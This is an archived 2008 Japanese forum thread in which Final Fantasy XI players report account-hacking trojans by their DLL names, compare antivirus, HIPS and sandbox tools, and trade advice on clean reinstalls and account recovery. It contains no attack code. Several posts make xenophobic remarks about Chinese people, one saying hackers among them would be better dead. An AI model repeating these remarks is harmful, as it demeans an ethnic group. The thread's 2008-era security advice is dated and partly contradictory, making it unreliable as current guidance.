686 名前：既にその名前は使われています：2008/08/18(月) 12:35:58 ID:sYYUh+7Z: シャットダウンも遅くなるけど、電源オプションを開く時に時間がかかる　ってのもなかったっけか
687 名前：既にその名前は使われています：2008/08/18(月) 12:40:11 ID:DFGjVuue: >>684
PG2を入れると環境によってはシャットダウンに時間がかかることがある
これは既出の問題でまったく症状の出ない人もいる
同一の状態のPCにおいて直ちにシャットダウンすることもあればそうでないことも

>>685
それはあなたが知らないだけ

今回の一連のトロイの場合は、終了のダイアログを出すこと自体にも時間がかかり
その後に電源を切るを選択した後も時間がかかるというものです

上記の症状とは別です
688 名前：既にその名前は使われています：2008/08/18(月) 12:48:52 ID:+PRaNhzF: ブルーバックの青じゃなくてデスクトップの青のままシャットダウンが完了しない
ファンはまだ動いてる、ディスクアクセスランプは消えてる
そのまま電源ボタンで消してるんだけどこれってアウト？
689 名前：既にその名前は使われています：2008/08/18(月) 12:50:25 ID:Ey6E/LQp: pg2 シャットダウンでググれば似た記事が見つかるぜ
俺は電源きるときや再起動する時は必ずPG2を手動で終了させてからやる
100%PG2のせいとは言い切れないから不安ならクリンインスコしる
690 名前：既にその名前は使われています：2008/08/18(月) 12:58:18 ID:+PRaNhzF: PG2はシャットダウン前に切ってる。
シャットダウンの前にインターネットの接続を切り、
その他タスクトレイにあるもので右クリックだけで終了できるものはすべて終了
(アンチウィルスソフトは終了させられなくて放置)

毎回シャットダウン失敗するわけでもないけど、よく失敗するんだ
691 名前：既にその名前は使われています：2008/08/18(月) 14:02:56 ID:oYbdQtaB: PC環境次第でしょ
うちはPG2入ってるがシャットダウン遅くもなってないし、
失敗すること無いしね。
692 名前：既にその名前は使われています：2008/08/18(月) 14:17:37 ID:gcf0YIvj: 私がハッキングされたPCで体験したシャットダウンに時間がかかるってのは

スタートメニューから終了オプションを選ぶと「コンピュータの電源を切る」っていう小窓が
出てくるのに5分近くかかった。

だからシャットダウンに時間がかかるって訳じゃなく、シャットダウンさせたいのにそれを指示するのに
時間がかかったって感じかなー。
693 名前：692：2008/08/18(月) 14:25:08 ID:gcf0YIvj: ↑はwzcsvbxm.dllタイプです。Karnaegh.dllとか他のは分かりません。
694 名前：既にその名前は使われています：2008/08/18(月) 14:27:44 ID:sYYUh+7Z: 復旧メール届いたが、まだしばらく性感しとこう
695 名前：既にその名前は使われています：2008/08/18(月) 14:39:43 ID:jwNn5lzR: >>631
もしかしてカスペって糞？
オススメのアンチウイルスソフト教えてください！
696 名前：既にその名前は使われています：2008/08/18(月) 14:47:22 ID:0vA1jfm8: >>672
感染したかしないかじゃなくて検知するかしないかなんだけどね
697 名前：既にその名前は使われています：2008/08/18(月) 14:48:02 ID:zkqvXg7f: ちょくちょく登場する検出率リストって何なの？

重要なのは、"クリティカルなウィルスの"検出率であって、
"とりあえずの"検出率なんて意味ないと思うんだが
698 名前：既にその名前は使われています：2008/08/18(月) 14:50:31 ID:HFFiyTj5: >>697
セキュ板からの出張さんです
699 名前：既にその名前は使われています：2008/08/18(月) 15:00:01 ID://4ed18n: >>697
それを踏まえての検出率だと思うんだ
700 名前：既にその名前は使われています：2008/08/18(月) 15:17:00 ID:j5eu0YWp: >>697
いまどきでも山田オルタでネ実にスレが立つんだぜ？

既存のマルチウェア対応に注意を払うのは当然だと思うけど。
701 名前：既にその名前は使われています：2008/08/18(月) 17:39:26 ID:4WfAUwre: 8月のマイクロソフトセキュリティ更新を確認する
http://internet.watch.impress.co.jp/cda/special/2008/08/18/20576.html
702 名前：既にその名前は使われています：2008/08/18(月) 17:47:06 ID:qm6+CLPl: 「Windows Update」のエラー報告が急増中，原因はウイルス
http://itpro.nikkeibp.co.jp/article/NEWS/20080814/312758/

他でも被害でてるみたいだ
703 名前：既にその名前は使われています：2008/08/18(月) 17:57:00 ID:E/GrkO28: 重要なのは「感染しないこと」です
704 名前：既にその名前は使われています：2008/08/18(月) 18:20:48 ID:E/GrkO28: その次に重要なのは感染しても発症させないことです
705 名前：既にその名前は使われています：2008/08/18(月) 18:29:03 ID:zkqvXg7f: その次に重要なのは、発症しても広めないことかな
706 名前：既にその名前は使われています：2008/08/18(月) 18:33:20 ID:RI751Yv7: >>705
例えばこんな風に感染の恐れのあるサイトを何の工夫無く張る事かな？

「ファイナルファンタジーXI プレイヤーズコレクション」第1弾販売開始！（2008/08/18）
ttp://www.playonline.com/ff11/topics/special/080818.html
感染力：低
症状：垢ハック受けてヅタボロのハズが課金を続け更に余計なお布施をしてしまう。
707 名前：既にその名前は使われています：2008/08/18(月) 18:43:43 ID:E/GrkO28: 重要度
　1.ウィルスに感染しない
　2.感染しても発症させない
　3.発症しても広めない←バスター系ソフトの順位はこの位置です
708 名前：既にその名前は使われています：2008/08/18(月) 18:46:35 ID:2gOglTHW: 現実的には感染＝発症と考えるべきだが

①マルウェアをPCに入れない
②マルウェアをPCに入れても実行させない
============セキュリティの壁============
③マルウェアを実行しても感染させない
④マルウェアに感染しても発症させない

感染…システムの汚染（PC起動時に自動的に実行されるようになる）
発症…有害な動作（ファイル流出、自動投稿、IDパス抜き、遠隔操作、他PCへの感染、等々）
709 名前：既にその名前は使われています：2008/08/18(月) 18:51:17 ID:E/GrkO28: >>708
レジストリを書き換えないマルウェアがあれば感染＝発症ですね
レジストリを書き換えにくるマルウェアはHIPSで発症は抑えられます
710 名前：既にその名前は使われています：2008/08/18(月) 19:44:07 ID:E/GrkO28: ちょっと言葉足らずでしたけど、HIPSが受け持つセキュリティ対策方法は
「②マルウェアをPCに入れても実行させない」の部分です
正確には「マルウェアがPCに入ってきたときに(＝感染したときに)レジストリへの
登録を阻止して実行を不許可にする(＝発症させない)」でしょうか

ただ、それをソフトが自動には識別してくれないので、レジストリへの登録の
許可・不許可の判断はPCを使っている人がしないといけませんけど
自動実行登録はなにか新しくソフトを入れたときくらいにしか聞いてこないので
それ以外の場面で聞いてくるようならウィルスを疑っていいと思いますし
不明な場合は検索してみると意外と答えが見つかったりします

まぁ、HIPSを入れてても100%安全だとは言えませんけどね
偶然が重なって、なにか新しいソフトを入れているときにたまたまマルウェアの
実行登録を聞かれて許可してしまった、なんてこともありえる話かもしれません
711 名前：既にその名前は使われています：2008/08/18(月) 20:03:59 ID:2fCI11sH: HIPSの機能は②と③にまたがってると思うが

未登録のプログラムが実行されるのを防ぐ機能が②
実行されたプログラムによるレジストリ書き換えを阻止する機能が③

正直、内部の書き換えが頻繁なネトゲPCにHIPSは向いてないと思う
役立たずのユルユル設定になるか、警告出すぎてゲームにならないのがオチ
712 名前：既にその名前は使われています：2008/08/18(月) 20:07:51 ID:Ympre9pR: 垢ハック被害にあったフレの話とか聞くと、「FF11アルザビ裏技.avi .exe」とか
平気で踏んじゃってるセキュリティ云々以前の問題というレベルから、スクリプトによるブラウザ経由の
感染まで色々あるけど、大抵は火狐とNoscriptや適切なFW、無料のウイルス対策ソフトなんかだけで、
万が一の事故も防げていたレベルが多いんだよな、そもそもハックされるまでアカウントという大事な物を
PCに入れているという自覚すらない、財産入った金庫の鍵あけて軒先に吊しておくレベル

このスレで個別のFWの話題ってあんまり出ないけど、みんなソフトウェアFWはあまり使ってないのかな
俺はPC Tools Firewall Plus愛用者、無料だし日本語にも対応してるし作動も軽い、以前使ってたZAみたく
通信忙しい状態で長時間使うと何故か強制終了して、当たり前の事のように自動でサービス再起動する
とかも無く、オンラインで通信続いたまま１週間でも動いてくれるのが有り難い、少数派ですかそうですか
713 名前：既にその名前は使われています：2008/08/18(月) 20:14:44 ID:48KJM+0M: 平和な日本なら仮に財産入った金庫の鍵あけて軒先に吊しておいても盗まれないかもしれないが
ネットには国と言う垣根がないからな
714 名前：既にその名前は使われています：2008/08/18(月) 20:41:54 ID:xV87syxr: ハック受けた後、プレイオンラインビューアー起動するのに時間かかるようになった気がする・・
気のせいならいいけど・・・。またされたら終わりだ・・・orz
715 名前：既にその名前は使われています：2008/08/18(月) 20:45:46 ID:8bWRsi68: >>714
そんなこと言ってるとまじにうけっぞｗ
ちゃんと対策しようぜｗ
716 名前：既にその名前は使われています：2008/08/18(月) 20:49:47 ID:vec6Yysd: >>712
PFWもHIPSと同様、ネトゲPCで上手く操るのは難しいからな、レスポンスも悪化するし
>>713
隠れて金庫を見張ってる奴がいるかもしれないから日本人は手を出さないが、
捕まっても失うものがない中華は平気で手を出すし、ネット上でなら尚更だな
>>714
当然、抹消専用ソフトでHDDを完全消去してからOSをクリーンインストールして
Windows Update後にクライアントを公式から落とし直して入れ直したんだよな？
717 名前：既にその名前は使われています：2008/08/18(月) 20:52:14 ID:8bWRsi68: >>692
それ俺もなったな。
すでにハッキングを受けていたのか・・・

こういうの苦手だから単純にPCが不安定になったんだと思っていたわorz
718 名前：既にその名前は使われています：2008/08/18(月) 21:05:38 ID:xV87syxr: 何かみんなと症状違うな・・。シャットダウンにも時間かからなかったし
症状自体でなかった。ずっと放置してあったPCキャラ覗いたら急にハックされた感じ・・。
>>716
クリーンインストールはしてない、オンライン＆自分のソフトでウィルスは感知されなかった
719 名前：既にその名前は使われています：2008/08/18(月) 21:06:34 ID:CoGNK0ec: >>712
火狐とNoscript
　
　　　　　　↑
こんなもん普通の奴は入れてねーよ
俺は入れてるけどな。ｱﾝﾁｳｲﾙｽ、最新Fﾌﾟﾚｲﾔｰ、FWでもIEで踏んじまったら感染するからどうしようもねぇ
720 名前：既にその名前は使われています：2008/08/18(月) 21:50:38 ID:c7OprUPA: >>711
そのとおりですね、わたしの書き方が間違ってましたm(_ _)m

ちなみにUnleakだと、レジストリに干渉することを実行ファイルごとに
許可登録ができますから、それほど頻繁に問い合わせがくることはないと
思いますが、わたし自身がFFは別PCでそっちにUnleakを入れていないので
そのうち試してみようと思います
721 名前：既にその名前は使われています：2008/08/18(月) 21:56:52 ID:zzLuCatQ: ワンケアかカスペ導入しようと思うのですが
どっちも同じ様なものですか？
722 名前：既にその名前は使われています：2008/08/18(月) 22:02:15 ID:dFbgkzOG: >>718
一度潜伏されたらアンチウィルスじゃ検知できなくなるタイプもいるんだけんども
723 名前：既にその名前は使われています：2008/08/18(月) 22:15:59 ID:xV87syxr: >>722
知らなかった・・。ありがとうm(_ _)mクリーンインストールしてきます！
724 名前：既にその名前は使われています：2008/08/18(月) 22:32:13 ID:c7OprUPA: >>721
90日試用版の出てるワンケアおすすめかな
そのあとカスペルスキーの試用版に変えてみていいほう(自分の環境とか
使い勝手で)を選べばおっけじゃないですか？
725 名前：既にその名前は使われています：2008/08/18(月) 22:34:57 ID:qt+dXOwM: KarnaeghDrv.dllの前兆症状って切り分けできてたっけ？
シャットダウン云々はwzcsvbxm.dllでは発生してたけども。
726 名前：既にその名前は使われています：2008/08/18(月) 22:37:32 ID:c7OprUPA: >>725
KarnaeghDrv.dllに関しては、前兆症状の報告はありませんでした
いまでも気をつけて見てますが、テンプレを作るだけの症状報告は
来ていません
727 名前：既にその名前は使われています：2008/08/18(月) 22:49:12 ID:vec6Yysd: >>719
Firefox+NoScriptはブラウザセキュリティの基本だが…

まあIEでも、「インターネットゾーン」を高、「信頼済みサイト」を中高に設定して
スクリプトやActiveXが必要なサイトを「信頼済みサイト」に登録する手が使える
しかしこの方法だと、スクリプトやActiveXコンテンツの置かれたドメインと
アドレスバーのURLのドメインが異なることも多いから、サイト登録が面倒なんだよな
728 名前：既にその名前は使われています：2008/08/18(月) 23:06:05 ID:nQkfbSm6: なんか急にインできなくなったんだけど。
垢ハックされた時って、プレイオンラインＩＤが違うとか表示される？；；
729 名前：既にその名前は使われています：2008/08/18(月) 23:09:11 ID:wee1r1p+: >>728
びんご
730 名前：既にその名前は使われています：2008/08/18(月) 23:10:18 ID:bwCOGLhh: プレイオンラインID
またはプレイオンラインパスワードが
違います。

ってなる。
731 名前：既にその名前は使われています：2008/08/18(月) 23:11:05 ID:HFFiyTj5: >>730
残念ながらアウアウです。
732 名前：既にその名前は使われています：2008/08/18(月) 23:12:44 ID:nQkfbSm6: 当たり前だが、ＰＣ再起動してもインできないお；；
733 名前：既にその名前は使われています：2008/08/18(月) 23:17:50 ID:bwCOGLhh: 俺じゃないです・・・

まぁ俺も気が進まなくてIE系使ってるから危ういんだが。
734 名前：既にその名前は使われています：2008/08/18(月) 23:18:36 ID:nQkfbSm6: サポート時間外とかふざけんなｗｗｗｗｗｗ
735 名前：既にその名前は使われています：2008/08/18(月) 23:26:50 ID:I3ikc6UV: 金曜の夜にハックされたらどうなるんだ？
736 名前：既にその名前は使われています：2008/08/18(月) 23:27:27 ID:vec6Yysd: ゲームクリアできてよかったじゃないか
ついでにハードディスクもクリアしとけ
>>733
いくらIEがセキュリティホールの宝庫といえども
「高」設定で侵入される脆弱性は滅多にないぞ
つーかIEコンポ使用ブラウザは何やってるか分からんから生IEより信用できん
737 名前：既にその名前は使われています：2008/08/18(月) 23:29:06 ID:dFbgkzOG: とりあえず別垢かFF以外で連絡取れるフレでもいたら
GM呼んでもらって垢凍結してもらいなされ

明日からサポチャリトライオンライン頑張れ
738 名前：既にその名前は使われています：2008/08/18(月) 23:29:20 ID:TFtacCiZ: >>735
知り合い通してGMに停止してもらうか
月曜にチャットボードから連絡。
ちなみに2日放置すると業者に釣りマクロ、箱開け、mobマクロされる
739 名前：既にその名前は使われています：2008/08/18(月) 23:31:18 ID:I3ikc6UV: >>738
要項によると本人でないと無理っぽいけど
740 名前：既にその名前は使われています：2008/08/18(月) 23:32:14 ID:2BkAeX9r: 本人じゃなくても停止だけならしてくれるよ
741 名前：既にその名前は使われています：2008/08/18(月) 23:34:04 ID:nQkfbSm6: 業者むかつく；；
マジで目の前に居たらぶん殴りたい；；
742 名前：既にその名前は使われています：2008/08/18(月) 23:34:29 ID:bwCOGLhh: そりゃ他人の要請でいきなり凍結されたらたまらんわｗ

嫌いなアイツをﾄｳｹｯﾂｰ
743 名前：既にその名前は使われています：2008/08/18(月) 23:35:28 ID:dFbgkzOG: >>735
月曜までサポートチャット待ち

６月上旬、XREA広告の罠経由のデータが業者に行き渡った最初の金曜日６月13日以来
金曜夜～日曜はスーパー垢ハックタイムとしてく恐れられておる
最近はGMもサポセンも繋がらないのを知って平日でも変わらんくなったけどねー
744 名前：既にその名前は使われています：2008/08/18(月) 23:36:53 ID:Kte3YJDG: あああああああああああああああああああああ
745 名前：既にその名前は使われています：2008/08/18(月) 23:39:55 ID:5tDS9ige: まだ垢ハック下火にならないか・・・・
746 名前：既にその名前は使われています：2008/08/18(月) 23:41:38 ID:dFbgkzOG: >>742
それがあるから本人確認に必要な情報なり
そう判断に足る充分な条件が揃わないと止めてはくれないはず

でも今までも第三者経由で止めてもらった報告は山ほどあるよ

コール者経由でGMからいくつか質問して確認したり
LSのＢＢＳにSOSカキコあって管理者がIPから本人の書き込みと確認→アカ凍結
なんて報告もあったはず
747 名前：既にその名前は使われています：2008/08/18(月) 23:44:59 ID:uUMMZDil: どこで聞けばいいのかよくわからんのですが
削除不能 TSPY_ONLINEG.QBP Trojan C:\WINDOWS\system32\apsghjba.dll
オンラインウィルスチェックしたらこれ出てきたんですけどヤバイですか？
PCの知識が無さ過ぎてどうすればいいのやら。
748 名前：既にその名前は使われています：2008/08/18(月) 23:50:40 ID:5tDS9ige: いまだにpolについてのシステム強化をしていないのか。クズエニは
亜種がたくさんでてるし、対応しきれないからあきらめてるのか？ｗ
749 名前：既にその名前は使われています：2008/08/18(月) 23:52:37 ID:nQkfbSm6: ウイルスが検出されました！
ファイル名： KcrnaeghDrv.dll
ウイルスの説明： Win32:Rootkit-gen [Rtk]

こんなの出た・・・やだ・・・なにこれ・・
750 名前：既にその名前は使われています：2008/08/18(月) 23:53:23 ID:PHsjYJFY: >>747
ネーミングがバスターくさいな
全くわからないならリカバリ
751 名前：既にその名前は使われています：2008/08/18(月) 23:54:14 ID:PHsjYJFY: >>749
XREAで投下されるアカハック。rootkit込み。
752 名前：既にその名前は使われています：2008/08/18(月) 23:55:49 ID:HFFiyTj5: >>749
どう見てもアウアウです。
駆除に自信がないならクリーンインスコ推奨れす。
>>747
それもオンゲのウイルスですな。FFに対応してるかどうかまでは分からないけど
怖いなら同じくクリーンインスコ後にセキュリティ強化推奨
753 名前：既にその名前は使われています：2008/08/18(月) 23:58:56 ID:qK+CzJJn: Sandboxieすごくね？
Webブラウザにコンドーム被せたくらいの安心感ｗ
おおっぴらにはまだオススメできないけど、すげー強固なセキュリティになりそうだからもうちょっと使い倒してみる。
754 名前：既にその名前は使われています：2008/08/19(火) 00:00:12 ID:cWc4sS4M: >>747
マカフィのページがたくさんヒットしました

マカフィ
ttp://www.mcafee.com/japan/security/virPQ2007.asp?v=PWS-OnlineGames.a

このあたりのものだと思われます
755 名前：既にその名前は使われています：2008/08/19(火) 00:00:43 ID:XZaGZzSX: どうしよう・・ＬＳの人に迷惑かかってなきゃいいけど・・。
マジで業者野放しだったのかよ、スクエニはあああああああああああああああ
756 名前：既にその名前は使われています：2008/08/19(火) 00:00:54 ID:KZn6yQAP: >>747
750もいってるように　バスタの名称ぽいけど
バスタで検出されたならメイン画面から　ウィルスデータベースに接続して詳細画確認できるんじゃないでしょうか
もしくは　「TSPY_ONLINEG.QBP」で検索してみましょう
＞PCの知識が無さ過ぎてどうすればいいのやら。
は　なんの免罪符にもなりませんよ。
757 名前：既にその名前は使われています：2008/08/19(火) 00:03:05 ID:cWc4sS4M: マカフィ情報では↓

概要
・PWS-OnlineGames.aはLineage、LegMir、World of Warcraft、Rohanといった
　オンラインゲームのアカウントを盗み出すトロイの木馬です。

だそうです
758 名前：既にその名前は使われています：2008/08/19(火) 00:06:04 ID:teIsHZGI: >>747
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FONLINEG%2EQBP
参照。
単一のダウンローダから1.gif～?.gif連番で実行、
そのうち26.gifを引っ掛けたものかと。数十匹いるものと思われ。
個別のセキュリティソフトの操作方法についてはセキュリティ板でどぞ。
759 名前：既にその名前は使われています：2008/08/19(火) 00:07:07 ID:bJQ/qQZx: どんなにセキュア強化してもIE使ってる限り感染しますよ
760 名前：既にその名前は使われています：2008/08/19(火) 00:11:32 ID:XZaGZzSX: 火狐＋avast！でやられました・・
761 名前：既にその名前は使われています：2008/08/19(火) 00:13:05 ID:1lEQFvWG: >>760
その火狐にはNoscriptは入っていたのかね
ついでにFlashplayerのバージョンは・・・と色々突っ込み所はあるのだけんども

とりあえず>>6埋める形で現状を整理してみなされ
762 名前：既にその名前は使われています：2008/08/19(火) 00:13:15 ID:cWc4sS4M: >>759
設定次第ですよ
763 名前：既にその名前は使われています：2008/08/19(火) 00:14:34 ID:teIsHZGI: >>759
んなこたないよ。
・利用者が圧倒的に多い
・大量のActiveXコントロールがOSコンポーネントとしてデフォルトで存在しているので
　イタズラしやすい(実例:chm、MDAC、VML)
から狙われやすいだけで。
きっちり脆弱性を塞いでいれば平気だし、
ゼロデイ食らったらIEもFxもやられることに変わりはないし、
FlashPlayerのようにIEとFx両方に存在する物の場合も変わりはない。
764 名前：560：2008/08/19(火) 00:26:13 ID:Eq5y1JjV: 俺一人で検証してもあまり説得力ないから、気が向いたら試してみてくれよ
本当にコンドーム級の安心感なんだ・・・

ネットワークセキュリティ板より
ttp://pc11.2ch.net/test/read.cgi/sec/1178731848/l50

1 ：名無しさん＠お腹いっぱい。：2007/05/10(木) 02:30:48
これはちょっといいかも。
SandboxieではWindows上にいわゆる「テスト環境」を作ってくれる。
このプログラムを起動した上でテストしたいプログラムを動かした場合、あなたのハードディスクに一切データを書き込むことなく動作確認ができるのだ。
なんだか怪しいなぁ、というプログラムや、ちょっと試してみたいだけ、というプログラムに威力を発揮するだろう。
またそうして試したプログラムは、Sandboxie上で削除するだけできれいさっぱり消えてくれるという簡単さである。
ネットの普及によって何が怪しいかがわかりにくくなっている。こうした「テスト環境」を提供してくれるソフトウェアはいいですね。

ttp://www.100shiki.com/archives/2007/05/windowssandboxie.html

ttp://www.sandboxie.com/
765 名前：既にその名前は使われています：2008/08/19(火) 00:27:28 ID:teIsHZGI: 名前…
766 名前：既にその名前は使われています：2008/08/19(火) 00:27:46 ID:Eq5y1JjV: いまSandboxieからギコナビ起動して書き込み中
560は気にしないでくれｗ
767 名前：既にその名前は使われています：2008/08/19(火) 00:28:14 ID:teIsHZGI: あっちの560は見なかったことにするｗ
768 名前：既にその名前は使われています：2008/08/19(火) 00:35:20 ID:Z09pNZxS: >>725
前兆というと、信長オンラインではクライアント落ちが多発してた、ってことかな
ＰＯＬやリネも対象になってるみたいだけど、信長でしか影響が確認できてないんだと思う
769 名前：既にその名前は使われています：2008/08/19(火) 02:32:04 ID:p5T0Z+DU: >>728
ついこないだの俺がいる。

サポセンに電話してパス再発行してもらってインしてみたら
鯖移転させられてて名前も変わってて流砂洞で金策させられてたぜｗ

もうネタにするしかねーよｗ
770 名前：既にその名前は使われています：2008/08/19(火) 02:47:09 ID:BOiTm1IE: >>764
砂箱の中でもSandboxieは結構良い評価もらってるソフトだねー。個人的には仮想環境でブラウズするよりはお手軽だとは思うよ。
ただし、問題が起きた時に自己対処できるくらいでないとちょっとお勧めはしないかなー。なんだかんだで色々面倒なところもあるし。

それと、きっちりFWやらHIPSやらAnti-Virusやらしっかり対策した上でやらないと予想外のところから一杯食わされたりするから注意なｗ
771 名前：既にその名前は使われています：2008/08/19(火) 02:59:17 ID:nTDoDOuK: >>769
名前もかわってるって（鯖移転の手続きだろうけれど）辛すぎる…
772 名前：既にその名前は使われています：2008/08/19(火) 03:13:12 ID:pSPsVu0V: PW変更の際、もうちょっとなんか聞いてくれたほうがいいよなぁ。
現状今の仕様だからこそ、２つのハードでやってる人はINしてる最中に垢ハックでINされた場合
すぐPW変えるなり、INするなりで運よかったら一時的には回避できるかもしれないけどもさ。
773 名前：既にその名前は使われています：2008/08/19(火) 03:25:04 ID:HprA3YvF: 垢ハックされなくなるなら、ログイン自体がもっとややこしくなったっていいぐらいだよね。
774 名前：既にその名前は使われています：2008/08/19(火) 03:32:02 ID:RmoxGzvI: >>770
Sandboxieでブラウザを起動したからといって
JavaScript全開にしたりすると危険なんですよね？
便利そうだなと思ったけどヘルプが英語でよくわからなかった＾＾；
775 名前：既にその名前は使われています：2008/08/19(火) 03:37:59 ID:o2RjCGUy: 本人にしかわからない質問（ママンの旧姓とか）を設定できるようにして
全く違うIPアドレス範囲からアクセスした場合は確認ダイアログがPOP UP。

これを実装するだけで垢ハックはほぼ防げるんだが＞■e
776 名前：既にその名前は使われています：2008/08/19(火) 03:42:26 ID:HprA3YvF: 今のログインやパス変更、変える気あんのかね？
思案中なり開発中なり、手がけてんなら何か示してほしい。
777 名前：既にその名前は使われています：2008/08/19(火) 03:55:37 ID:1hOqTqRa: 中国人はそれで生きてるんだからハックされてやれ
778 名前：既にその名前は使われています：2008/08/19(火) 04:02:05 ID:HMd3aFJK: >>777

ハックする中国人なんて死んだほうが世界のためになる＾；
779 名前：既にその名前は使われています：2008/08/19(火) 04:04:10 ID:bJQ/qQZx: 生きてるというか荒稼ぎしてんだよ
円は中国の元の10倍の価値があるしな

今１元１５円ぐらい
http://www2.odn.ne.jp/ccw94440/braidal/page045.html

中国のサラリーマンの平均月収が日本円で15000円～30000円だからRMTでギルを10万売ると・・・・あとはわかるな？
780 名前：既にその名前は使われています：2008/08/19(火) 04:06:01 ID:WkTA7QsW: そして大事な円が流出しても
リアルマネー使ってＲＭＴしてるのは日本人なんだよな。
本当に何考えてるんだといいたい
781 名前：既にその名前は使われています：2008/08/19(火) 04:12:22 ID:9sXJO7M8: ubuntuとのデュアルブートにして、
ネット閲覧をubuntuでするのが手っ取り早くね？
火狐３もつかえるし、２chブラウザもあるよ。
782 名前：既にその名前は使われています：2008/08/19(火) 04:36:57 ID:c4vbCmYc: >>781
いや、案外再起動の手間ってめんどくさいものよ。それにデュアルブートの仕組み関連でトラブルが
起きた場合、詳しくない人の場合、両OSをまっさらから入れなおすしか出来ないことも有ろう。
Linux側からNTFSを操作するのも多少めんどいし。
だったら仮想環境とかの方が色々お手軽でいいんじゃないかと思うよ。仮想化したHDDイメージとか
とっておけばどこでもすぐに仮想環境を設置できるからね。

Sandboxieは私も使っているけど、仮想PC上で動かしているな。念を入れ過ぎかもしれないけど、
ウイルス検証等はこれぐらいしないと怖いからなー。
783 名前：既にその名前は使われています：2008/08/19(火) 04:38:51 ID:aVGKaRBf: >>776
普通に考えれば「ない」だろ
だって、すでにハックされてるかもしれないのに今から変えても無意味すぎる
やるなら全PCに本人確認しなきゃいけないわけで

まあ、そうなったらムーミン谷在住の人や垢買いは一気にアボーンだな
784 名前：既にその名前は使われています：2008/08/19(火) 04:43:41 ID:HprA3YvF: リネだかなんかは、すごい面倒なんじゃなかったっけ。
あれって最初からじゃないよね？
785 名前：既にその名前は使われています：2008/08/19(火) 05:26:58 ID:D0VnZyQ8: スレ違いすみません。今どき～見失いどこにいるのか分からなく・・・
パソコン詳しい方多そうなので　ここにカキコ失礼します・・・。今どきage頂けると幸いです
ウィンドウズXPでOCN使ってます。以前は（クリーンインストール以前は）
アプリケーションボタン押すとネットに繋がる設定だったのですが出来なくなってしまい
接続方法ご存知の方いれば教えて下さい。
786 名前：既にその名前は使われています：2008/08/19(火) 05:28:18 ID:AXHGkB9H: いつの時代であろうがどんなセキュリティくんでようがｗ
間抜けとしかおもわねぇぇぇぇlsいてたら弄る対象にはなるかもしれないがｗ
かわいそうなどと言う対象にはならねぇｌｗｗｗｗｗｗｗ

この暇な時代に話題提供してくれた程度にしかなｗｗｗｗｗｗｗｗｗｗｗｗ
垢ファックはっきりいおう　間抜けｗｗｗｗこれ以外に言葉はないからなｗ
ｗｗ３ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
787 名前：既にその名前は使われています：2008/08/19(火) 05:56:23 ID:Q0z2pw6M: それはごもっともだけどｵﾚの考えは違った｡
788 名前：既にその名前は使われています：2008/08/19(火) 06:13:37 ID:K/1q58QB: >>785です。
スレ違い失礼しました。あちらに書き直しましたm(_ _)m
789 名前：既にその名前は使われています：2008/08/19(火) 07:48:22 ID:iXG2J2yi: 約1ヶ月と1週間で復旧完了しました。
ハックされる前日に半年かけてとったアイテムがあって、
復旧でハック3日くらいまえにもどったっぽくって
アイテムなくなってた><
アイテム救済措置とかで戻るかどうかわかります？
戻らなかったら引退しよう…
790 名前：既にその名前は使われています：2008/08/19(火) 07:55:16 ID:YExglfJ6: >>789
まずは半年かけて取ったアイテムが何なのか答えて貰おうか
791 名前：既にその名前は使われています：2008/08/19(火) 08:10:40 ID:UixUoUwh: 789です。アイテムはサルベージ装備です(>_<)がんばったのにな。
792 名前：既にその名前は使われています：2008/08/19(火) 08:33:27 ID:AXHGkB9H: よぉーく考えてごらんｗ元にはもどらんｗセーブポイントが3日前だったのよｗ
あきらめて引退するかｗがんがってもう一度トライするかｗお前しだいだｗ
793 名前：既にその名前は使われています：2008/08/19(火) 08:47:55 ID:UixUoUwh: まじですかぁ…。
前どっかで見たことあるんですけど捨てちゃったアイテム一回だけ戻してもらえるみたいなの。それとキャラの巻き戻しは一緒なんですかねぇ？
諦めきれないやー。
794 名前：既にその名前は使われています：2008/08/19(火) 08:58:49 ID:FrwCB4v4: サル装備なら預けてある状態に巻き戻るって事はないの？
795 名前：既にその名前は使われています：2008/08/19(火) 09:02:29 ID:diJvyF3J: ゲームデータの復元は、サーバーのバックアップデータをもとに、ゲームデータを不正アクセスに遭う前の状態に戻す措置です。

※いつの時点のゲームデータに戻すかを、あらかじめ特定することはできません。また、会員ご本人が希望する時点のゲームデータに戻すこともできません。

※復元に使用するバックアップデータの作成されたタイミングによっては、いくつかのアイテムが競売所に出品中、あるいは宅配で配送進行中となっている場合があります。その際、これらに該当するアイテムを復元することはできません。

※何らかの事情でサーバーにバックアップデータが存在しないなどの理由で、ゲームデータを復元できないことがあります。
796 名前：既にその名前は使われています：2008/08/19(火) 09:12:22 ID:w6SO7RbV: >>793
おまえまだ言ってんのｗ
797 名前：既にその名前は使われています：2008/08/19(火) 09:14:56 ID:rwRayN+k: >>781
>ネット閲覧をubuntuでするのが手っ取り早くね？
正直俺もそう思うね、Windows/openSUSEのデュアルブートで常用してるけど特段面倒だと思った事も無い。
Windowsのセットアップ時に予めパーティション切っておけば何の問題もなく導入できるし。
798 名前：既にその名前は使われています：2008/08/19(火) 09:23:38 ID:diJvyF3J: ブラウザ用としてUbuntu使うなら、デュアルブートするより
VirtualBoxかVMwareの仮想マシン使った方が手っ取り早いだろ
ttp://www.ubuntulinux.jp/news/ubuntu804-ja-vm
799 名前：既にその名前は使われています：2008/08/19(火) 09:39:55 ID:8+kZaTsa: 手っ取り早いけどlinux初心者にはflashのインスコすら難しくて困るｗ
FFAHとネ実を見るだけならいいんだけどね
800 名前：既にその名前は使われています：2008/08/19(火) 10:50:43 ID:rhZr/eFk: さっそく紹介されたsandboxie入れて書き込み
設定デフォルトでいいんかね？
とりあえずここにはそのまま来れたんだがｗ
801 名前：既にその名前は使われています：2008/08/19(火) 11:03:00 ID:c9sTNsNc: データ復元されたんだが、
装備貸してるときにバックアップされたデータぽくて
返してもらった後にハックされたから貸してたアイテムがない。
競売や宅配に出してたわけじゃないから駄目元で聞いてみるか。
802 名前：既にその名前は使われています：2008/08/19(火) 11:14:56 ID:hLQAHGV0: 質問(ノ＞＜)ノ
ハック後　クリーンインストールする前に新たなパスで入っちゃったんですが
ハックってパス入力した際に抜けれますか？ウィルス起動してからですか？
今はクリーンインストール等完了してるのですが・・・。
もし入力でハックならサポセンでパス変更依頼したほうがいいでしょうか？
（現在はその新たなパスで入れる状態）
803 名前：既にその名前は使われています：2008/08/19(火) 11:19:45 ID:ehIRtwW/: >>802
日本語でおｋ
